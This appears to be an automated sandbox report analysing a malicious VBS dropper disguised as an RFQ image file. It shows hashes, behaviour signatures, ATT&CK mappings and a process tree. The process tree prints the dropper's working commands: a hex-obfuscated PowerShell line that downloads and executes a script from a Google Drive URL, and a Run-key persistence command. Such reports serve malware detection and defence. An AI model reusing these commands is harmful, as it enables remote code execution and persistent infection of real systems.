e81b0ab02b19ac2f9e57d1db647377d1449a4f08bb95070b49f81249b44ed43f

Analysis

max time kernel
151s
max time network
103s
platform
windows7_x64
resource
win7v200430
submitted
13/07/2020, 05:34

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

RFQ_IMAGES_Hayyas (Waltham Cross).vbs
Size

10KB
MD5

b4d24a672f4a1daa990c11c03db8295e
SHA1

16b930060de04f72d7f9b735c5c383fbb256e2a4
SHA256

e81b0ab02b19ac2f9e57d1db647377d1449a4f08bb95070b49f81249b44ed43f
SHA512

f4c874f2d194a587b9cf08b3a0d2553e03ca98cf1409d26ccfb970532d2e5d1608d38a3abc32aad35c3d3824d24b5fca7f0407306053a3a24b6f3099a48c99c0

Score

10^/10

persistence

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1612	324	Powershell.exe	24
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	324	Powershell.exe	24
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1028	324	cmd.exe	24

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	1612	Powershell.exe
Token: SeDebugPrivilege	740	Powershell.exe
Token: SeIncreaseQuotaPrivilege	1612	Powershell.exe
Token: SeSecurityPrivilege	1612	Powershell.exe
Token: SeTakeOwnershipPrivilege	1612	Powershell.exe
Token: SeLoadDriverPrivilege	1612	Powershell.exe
Token: SeSystemProfilePrivilege	1612	Powershell.exe
Token: SeSystemtimePrivilege	1612	Powershell.exe
Token: SeProfSingleProcessPrivilege	1612	Powershell.exe
Token: SeIncBasePriorityPrivilege	1612	Powershell.exe
Token: SeCreatePagefilePrivilege	1612	Powershell.exe
Token: SeBackupPrivilege	1612	Powershell.exe
Token: SeRestorePrivilege	1612	Powershell.exe
Token: SeShutdownPrivilege	1612	Powershell.exe
Token: SeDebugPrivilege	1612	Powershell.exe
Token: SeSystemEnvironmentPrivilege	1612	Powershell.exe
Token: SeRemoteShutdownPrivilege	1612	Powershell.exe
Token: SeUndockPrivilege	1612	Powershell.exe
Token: SeManageVolumePrivilege	1612	Powershell.exe
Token: 33	1612	Powershell.exe
Token: 34	1612	Powershell.exe
Token: 35	1612	Powershell.exe
Token: SeIncreaseQuotaPrivilege	1612	Powershell.exe
Token: SeSecurityPrivilege	1612	Powershell.exe
Token: SeTakeOwnershipPrivilege	1612	Powershell.exe
Token: SeLoadDriverPrivilege	1612	Powershell.exe
Token: SeSystemProfilePrivilege	1612	Powershell.exe
Token: SeSystemtimePrivilege	1612	Powershell.exe
Token: SeProfSingleProcessPrivilege	1612	Powershell.exe
Token: SeIncBasePriorityPrivilege	1612	Powershell.exe
Token: SeCreatePagefilePrivilege	1612	Powershell.exe
Token: SeBackupPrivilege	1612	Powershell.exe
Token: SeRestorePrivilege	1612	Powershell.exe
Token: SeShutdownPrivilege	1612	Powershell.exe
Token: SeDebugPrivilege	1612	Powershell.exe
Token: SeSystemEnvironmentPrivilege	1612	Powershell.exe
Token: SeRemoteShutdownPrivilege	1612	Powershell.exe
Token: SeUndockPrivilege	1612	Powershell.exe
Token: SeManageVolumePrivilege	1612	Powershell.exe
Token: 33	1612	Powershell.exe
Token: 34	1612	Powershell.exe
Token: 35	1612	Powershell.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	532	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1612	Powershell.exe
740	Powershell.exe
740	Powershell.exe
1612	Powershell.exe
1600	powershell.exe
1884	powershell.exe
1096	powershell.exe
532	powershell.exe
112	powershell.exe
2072	powershell.exe
2212	powershell.exe
2404	powershell.exe
2532	powershell.exe

Blacklisted process makes network request 2 IoCs

flow	pid	Process
5	1612	Powershell.exe
7	1612	Powershell.exe

Suspicious use of WriteProcessMemory 90 IoCs

description	pid	Process	procid_target
PID 1612 wrote to memory of 628	1612	Powershell.exe	32
PID 1612 wrote to memory of 628	1612	Powershell.exe	32
PID 1612 wrote to memory of 628	1612	Powershell.exe	32
PID 1612 wrote to memory of 1120	1612	Powershell.exe	33
PID 1612 wrote to memory of 1120	1612	Powershell.exe	33
PID 1612 wrote to memory of 1120	1612	Powershell.exe	33
PID 1612 wrote to memory of 1600	1612	Powershell.exe	35
PID 1612 wrote to memory of 1600	1612	Powershell.exe	35
PID 1612 wrote to memory of 1600	1612	Powershell.exe	35
PID 1612 wrote to memory of 1744	1612	Powershell.exe	37
PID 1612 wrote to memory of 1744	1612	Powershell.exe	37
PID 1612 wrote to memory of 1744	1612	Powershell.exe	37
PID 1612 wrote to memory of 1880	1612	Powershell.exe	38
PID 1612 wrote to memory of 1880	1612	Powershell.exe	38
PID 1612 wrote to memory of 1880	1612	Powershell.exe	38
PID 1612 wrote to memory of 1884	1612	Powershell.exe	40
PID 1612 wrote to memory of 1884	1612	Powershell.exe	40
PID 1612 wrote to memory of 1884	1612	Powershell.exe	40
PID 1612 wrote to memory of 1928	1612	Powershell.exe	42
PID 1612 wrote to memory of 1928	1612	Powershell.exe	42
PID 1612 wrote to memory of 1928	1612	Powershell.exe	42
PID 1612 wrote to memory of 824	1612	Powershell.exe	43
PID 1612 wrote to memory of 824	1612	Powershell.exe	43
PID 1612 wrote to memory of 824	1612	Powershell.exe	43
PID 1612 wrote to memory of 1096	1612	Powershell.exe	45
PID 1612 wrote to memory of 1096	1612	Powershell.exe	45
PID 1612 wrote to memory of 1096	1612	Powershell.exe	45
PID 1612 wrote to memory of 1360	1612	Powershell.exe	48
PID 1612 wrote to memory of 1360	1612	Powershell.exe	48
PID 1612 wrote to memory of 1360	1612	Powershell.exe	48
PID 1612 wrote to memory of 1808	1612	Powershell.exe	49
PID 1612 wrote to memory of 1808	1612	Powershell.exe	49
PID 1612 wrote to memory of 1808	1612	Powershell.exe	49
PID 1612 wrote to memory of 532	1612	Powershell.exe	51
PID 1612 wrote to memory of 532	1612	Powershell.exe	51
PID 1612 wrote to memory of 532	1612	Powershell.exe	51
PID 1612 wrote to memory of 1564	1612	Powershell.exe	53
PID 1612 wrote to memory of 1564	1612	Powershell.exe	53
PID 1612 wrote to memory of 1564	1612	Powershell.exe	53
PID 1612 wrote to memory of 1888	1612	Powershell.exe	54
PID 1612 wrote to memory of 1888	1612	Powershell.exe	54
PID 1612 wrote to memory of 1888	1612	Powershell.exe	54
PID 1612 wrote to memory of 112	1612	Powershell.exe	55
PID 1612 wrote to memory of 112	1612	Powershell.exe	55
PID 1612 wrote to memory of 112	1612	Powershell.exe	55
PID 1612 wrote to memory of 1816	1612	Powershell.exe	58
PID 1612 wrote to memory of 1816	1612	Powershell.exe	58
PID 1612 wrote to memory of 1816	1612	Powershell.exe	58
PID 1612 wrote to memory of 2056	1612	Powershell.exe	59
PID 1612 wrote to memory of 2056	1612	Powershell.exe	59
PID 1612 wrote to memory of 2056	1612	Powershell.exe	59
PID 1612 wrote to memory of 2072	1612	Powershell.exe	60
PID 1612 wrote to memory of 2072	1612	Powershell.exe	60
PID 1612 wrote to memory of 2072	1612	Powershell.exe	60
PID 1612 wrote to memory of 2140	1612	Powershell.exe	63
PID 1612 wrote to memory of 2140	1612	Powershell.exe	63
PID 1612 wrote to memory of 2140	1612	Powershell.exe	63
PID 1612 wrote to memory of 2180	1612	Powershell.exe	64
PID 1612 wrote to memory of 2180	1612	Powershell.exe	64
PID 1612 wrote to memory of 2180	1612	Powershell.exe	64
PID 1612 wrote to memory of 2212	1612	Powershell.exe	65
PID 1612 wrote to memory of 2212	1612	Powershell.exe	65
PID 1612 wrote to memory of 2212	1612	Powershell.exe	65
PID 1612 wrote to memory of 2288	1612	Powershell.exe	68
PID 1612 wrote to memory of 2288	1612	Powershell.exe	68
PID 1612 wrote to memory of 2288	1612	Powershell.exe	68
PID 1612 wrote to memory of 2324	1612	Powershell.exe	69
PID 1612 wrote to memory of 2324	1612	Powershell.exe	69
PID 1612 wrote to memory of 2324	1612	Powershell.exe	69
PID 1612 wrote to memory of 2404	1612	Powershell.exe	71
PID 1612 wrote to memory of 2404	1612	Powershell.exe	71
PID 1612 wrote to memory of 2404	1612	Powershell.exe	71
PID 1612 wrote to memory of 2468	1612	Powershell.exe	73
PID 1612 wrote to memory of 2468	1612	Powershell.exe	73
PID 1612 wrote to memory of 2468	1612	Powershell.exe	73
PID 1612 wrote to memory of 2492	1612	Powershell.exe	74
PID 1612 wrote to memory of 2492	1612	Powershell.exe	74
PID 1612 wrote to memory of 2492	1612	Powershell.exe	74
PID 1612 wrote to memory of 2532	1612	Powershell.exe	76
PID 1612 wrote to memory of 2532	1612	Powershell.exe	76
PID 1612 wrote to memory of 2532	1612	Powershell.exe	76
PID 1612 wrote to memory of 2652	1612	Powershell.exe	78
PID 1612 wrote to memory of 2652	1612	Powershell.exe	78
PID 1612 wrote to memory of 2652	1612	Powershell.exe	78
PID 1612 wrote to memory of 2708	1612	Powershell.exe	79
PID 1612 wrote to memory of 2708	1612	Powershell.exe	79
PID 1612 wrote to memory of 2708	1612	Powershell.exe	79
PID 1612 wrote to memory of 2752	1612	Powershell.exe	81
PID 1612 wrote to memory of 2752	1612	Powershell.exe	81
PID 1612 wrote to memory of 2752	1612	Powershell.exe	81

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	Powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Adds Run entry to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\RFQ_IMAGES_Hayyas (Waltham Cross).vbs"	Powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs"
1⤵
PID:1356

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -ExecutionPolicy Bypass $eVsOKCmwhwGIfbAcCemV='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70 69 6E 67 20 3D 20 74 65 73 74 2D 63 6F 6E 6E 65 63 74 69 6F 6E 20 2D 63 6F 6D 70 20 67 6F 6F 67 6C 65 2E 63 6F 6D 20 2D 63 6F 75 6E 74 20 31 20 2D 51 75 69 65 74 7D 20 75 6E 74 69 6C 20 28 24 70 69 6E 67 29 3B 24 70 32 32 20 3D 20 5B 45 6E 75 6D 5D 3A 3A 54 6F 4F 62 6A 65 63 74 28 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 54 79 70 65 5D 2C 20 33 30 37 32 29 3B 5B 53 79 73 74 65 6D 2E 4E 65 74 2E 53 65 72 76 69 63 65 50 6F 69 6E 74 4D 61 6E 61 67 65 72 5D 3A 3A 53 65 63 75 72 69 74 79 50 72 6F 74 6F 63 6F 6C 20 3D 20 24 70 32 32 3B 24 6D 76 3D 27 28 4E 27 2B 27 65 77 27 2B 27 2D 4F 27 2B 27 62 27 2B 27 6A 65 27 2B 27 63 27 2B 27 74 20 27 2B 20 27 4E 65 27 2B 27 74 2E 27 2B 27 57 27 2B 27 65 62 27 2B 27 43 27 2B 27 6C 69 27 2B 27 65 6E 74 29 27 2B 27 2E 44 27 2B 27 6F 77 27 2B 27 6E 6C 27 2B 27 6F 61 27 2B 27 64 27 2B 27 53 27 2B 27 74 72 27 2B 27 69 6E 67 28 27 27 68 74 74 70 73 3A 2F 2F 64 72 69 76 65 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 75 2F 30 2F 75 63 3F 69 64 3D 31 38 32 55 76 69 43 45 66 6C 79 48 70 57 36 71 56 68 68 68 61 45 33 59 46 48 72 48 4E 6D 52 66 6B 26 65 78 70 6F 72 74 3D 64 6F 77 6E 6C 6F 61 64 27 27 29 27 7C 49 60 45 60 58 3B 24 61 73 63 69 69 43 68 61 72 73 3D 20 24 6D 76 20 2D 73 70 6C 69 74 20 27 2D 27 20 7C 46 6F 72 45 61 63 68 2D 4F 62 6A 65 63 74 20 7B 5B 63 68 61 72 5D 5B 62 79 74 65 5D 22 30 78 24 5F 22 7D 3B 24 61 73 63 69 69 53 74 72 69 6E 67 3D 20 24 61 73 63 69 69 43 68 61 72 73 20 2D 6A 6F 69 6E 20 27 27 7C 4D';$jm=$eVsOKCmwhwGIfbAcCemV.Split(' ') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:1612
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:1600
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:1744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:1884
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:1928
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:1096
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:1360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:532
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:1564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:112
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:1816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:2072
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:2140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:2212
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:2404
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:2468
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in System32 directory
  PID:2532
- C:\Windows\System32\calc.exe
  "C:\Windows\System32\calc.exe"
  2⤵
  PID:2652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  PID:2752

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell $g='C:\Users\Admin\AppData\Local\Microsoft\RFQ_IMAGES_Hayyas (Waltham Cross).vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Adds Run entry to start application
PID:740

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Users\Admin\AppData\Local\Temp\RFQ_IMAGES_Hayyas (Waltham Cross).vbs" "C:\Users\Admin\AppData\Local\Microsoft\" /Y
1⤵
- Process spawned unexpected child process
PID:1028

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1356-0-0x00000000025A0000-0x00000000025A4000-memory.dmp

Filesize
16KB

Download